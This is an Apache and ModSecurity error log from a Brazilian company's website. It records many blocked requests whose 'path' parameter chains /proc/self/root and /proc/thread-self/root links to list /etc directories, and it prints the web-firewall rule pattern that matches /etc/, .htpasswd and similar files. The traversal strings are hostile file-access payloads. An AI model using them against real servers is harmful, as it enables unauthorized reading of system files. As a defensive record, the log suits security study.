https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:28:24.022105 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.241.31:58016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FKPXLqtnMIWvjpaJ8EQAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:28:27.450497 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:58026] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FKta6ubjKNq_cu4azMAAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:28:27.453029 2026] [:error] [pid 7893:tid 140411725141760] [client 216.73.216.191:29641] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FKhCii7xarUs8iHZIyAAAAgI"]
[Fri Mar 20 05:28:29.210984 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:44414] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FLeoXxyEfFpUF8f9jdwAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:28:29.679481 2026] [:error] [pid 11167:tid 140411666392832] [client 74.7.241.31:44416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FLfHIg5MgXLBnicPbUAAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:28:29.994338 2026] [:error] [pid 15826:tid 140411649607424] [client 216.73.216.191:23615] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FLeoXxyEfFpUF8f9jeQAAAUs"]
[Fri Mar 20 05:28:33.216254 2026] [:error] [pid 11167:tid 140411691570944] [client 74.7.243.128:45612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FMPHIg5MgXLBnicPbVwAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 05:28:33.222899 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.241.31:44430] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FMAF0L0L-SsrnPo5JzwAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:28:35.123633 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.241.31:44436] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FM11pVZ5mVmJwsFMRMgAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:28:37.901245 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.241.31:44448] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FNfXLqtnMIWvjpaJ8GAAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:28:38.225917 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.243.128:32918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FNvqxLDW4GITHUkTEnQAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 05:28:40.585032 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.241.31:46748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FOPXLqtnMIWvjpaJ8GwAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:28:42.059351 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:46764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FOuoXxyEfFpUF8f9jiQAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:28:46.023624 2026] [:error] [pid 11167:tid 140411674785536] [client 74.7.241.31:46780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FPvHIg5MgXLBnicPbZQAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:28:47.550821 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.241.31:47376] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FP11pVZ5mVmJwsFMRQAAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:28:48.895814 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:47384] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FQBCii7xarUs8iHZI3QAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:28:50.224636 2026] [:error] [pid 10189:tid 140411691570944] [client 74.7.241.31:47386] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FQjJ3M9BSuKP7CAb04wAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:28:53.304917 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.241.31:47390] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FRPHIg5MgXLBnicPbcgAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:28:55.075423 2026] [:error] [pid 9818:tid 140411548894976] [client 74.7.241.31:47396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FR11pVZ5mVmJwsFMRRgAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:00.733373 2026] [:error] [pid 11642:tid 140411616036608] [client 74.7.241.31:47406] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FTLninkcc-iUj5ApAawAAA48"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:02.091995 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.241.31:37798] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FTrninkcc-iUj5ApAbgAAA5A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:29:02.092532 2026] [mime_magic:error] [pid 7235:tid 140411741927168] (70014)End of file found: [client 57.141.18.24:49914] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 05:29:03.821104 2026] [:error] [pid 7893:tid 140411641214720] [client 216.73.216.191:64480] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0FTxCii7xarUs8iHZI6AAAAgw"]
